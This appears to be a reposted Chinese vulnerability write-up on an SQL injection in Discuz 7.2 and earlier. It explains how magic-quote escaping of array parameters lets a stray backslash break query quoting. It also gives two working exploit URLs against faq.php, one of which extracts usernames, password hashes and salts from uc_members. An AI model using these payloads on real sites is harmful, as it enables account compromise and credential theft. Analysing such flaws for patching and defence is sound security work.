您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
Discuz<= 7.2 SQL注入漏洞分析
访卉2025-07-04Discuz教程已有人查阅
导读Discuz树大招风已成常态,不过对于其他整站程序何尝不是如此?是否曾记得大明湖畔的PHPCMS和DEDCMS万人破的场景,流行整站程序最重要的还是漏洞的快速响应。0x01 漏洞成因:
Discuz树大招风已成常态,不过对于其他整站程序何尝不是如此?是否曾记得大明湖畔的PHPCMS和DEDCMS万人破的场景,流行整站程序最重要的还是漏洞的快速响应。0x01
漏洞成因:
在《高级PHP应用程序漏洞审核技术》一文里的"魔术引号带来的新的安全问题"一节里,有提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体现,如下面的代码片段:
0x02
漏洞测试
测试漏洞存在的语句 & 爆出账号+密码+salt的语句:
漏洞成因:
在《高级PHP应用程序漏洞审核技术》一文里的"魔术引号带来的新的安全问题"一节里,有提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体现,如下面的代码片段:
1 // foo.php?xigr='ryat
2
3 function daddslashes($string, $force = 0) {
4 !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
5 if(!MAGIC_QUOTES_GPC || $force) {
6 if(is_array($string)) {
7 foreach($string as $key => $val) {
8 $string[$key] = daddslashes($val, $force);
9 }
10 } else {
11 $string = addslashes($string);
12 }
13 }
14 return $string;
15 }
16 ...
17 foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
18 foreach($$_request as $_key => $_value) {
19 $_key{0} != '_' && $$_key = daddslashes($_value);
20 }
21 }
22
23 echo $xigr['hi'];
上面的代码原本期望得到一个经过daddslashes()安全处理后的数组变量$xigr['hi'],但是没有对变量$xigr做严格的类型规定,当我们提交一个字符串变量$xigr='ryat,经过上面的处理变为\'ryat,到之后$xigr['hi']就会输出\,如果这个变量引入到SQL语句,那么就会引起严重的安全问题了,再来看下面的代码片段:
1 if($xigr) {
2 foreach($xigr as $k => $v) {
3 $uids[] = $v['uid'];
4 }
5 $query = $db->query("SELECT uid FROM users WHERE uid IN ('".implode("','", $uids)."')");
利用上面提到的思路,通过提交foo.php?xigr[]='&xigr[][uid]=evilcode这样的构造形式可以很容易的突破GPC或类似的安全处理,形成SQL注射漏洞。0x02
漏洞测试
测试漏洞存在的语句 & 爆出账号+密码+salt的语句:
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
// 综合自Freebuf分析 & http:// .80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt
本文标签:
很赞哦! ()
下一篇:小白安装Discuz论坛步骤教程
相关教程
图文教程
Discuz论坛关闭了吗?Discuz论坛重新恢复运营
最近,discuz创始人吴洪声(奶罩)对外宣布discuz在经历几个月的停止运营之后,discuz论坛再次回归开始恢复正常运营!
xampp搭建discuz论坛的方法
1.浏览器中输入http://localhost:80/phpmyadmin/,或者点击mysql的admin,进入mysql数据库2.new->create,创建数据库3.浏览器中输出localhost:80/bbs
discuz相册功能在哪,怎么用
discuz相册位于discuz后台的“站点功能”中,其查找方法:1、登录discuz网站的后台;2、找到并点击“管理中心”;2、找到并打开“全局”;3、在左侧位置找到“站点功能”
discuz帖子模块用到的表及自动发帖函数介绍
最近在做一个discuz的插件,由于需要程序自动生成并调用discuz已经存在插件的帖子。然而这就相当于自动发帖的功能了。网上找了一下,大部分都是通过curl模拟登陆,模拟发帖的
相关源码
-
(自适应响应式)宠物经验资讯咨询博客pbootcms网站源码下载除宠物资讯领域外,通过内容替换可快速适配宠物用品商城、宠物医疗咨询平台、宠物训练教程网站、动物保护组织官网、水族爱好者社区等垂直领域。查看源码 -
(自适应)物流运输快递仓储货运网站模板免费下载基于PbootCMS内核开发的物流运输行业专用模板,深度适配仓储货运企业的业务展示需求。前端采用响应式布局,自动适配手机端访问,后台数据实时同步更新,帮助企业高效展示运输网络、仓储设施、服务流程等核心业务模块。查看源码 -
(自适应响应式)html5蓝色智能水表营销型网站pbootcms模板下载PbootCMS内核开发,为智能水表企业打造的营销型网站解决方案,本模板基于PbootCMS内核开发,为智能水表及相关行业企业设计,采用HTML5+CSS3技术构建,具有响应式布局。查看源码 -
(响应式)WordPress主题Ripro9.0博客免扩展二开版RiPro9.0是基于RiPro8.9版本深度二开优化的资源付费主题,源码修正,修复原版多处功能异常,确保系统稳定运行。支持虚拟主机环境部署,无需特殊服务器配置。查看源码 -
(自适应)简繁双语响应式服装服饰西装工装校服定制pbootcms模板本模板基于PbootCMS内核开发,为服装服饰行业量身打造,尤其适合西装定制、工装生产、校服订制等服装类企业使用。模板采用响应式布局设计,确保在手机、平板、电脑查看源码 -
帝国cms7.5个人博客资讯文章模板下载本模板简洁个人博客网站设计开发,采用帝国CMS内核构建,只需替换文字图片即可快速搭建专业网站。自适应手机端设计,数据实时同步,操作简单便捷。PHP程序确保安全稳定运行,帮助您以较低成本获取持续业务。查看源码
| 分享笔记 (共有 篇笔记) |
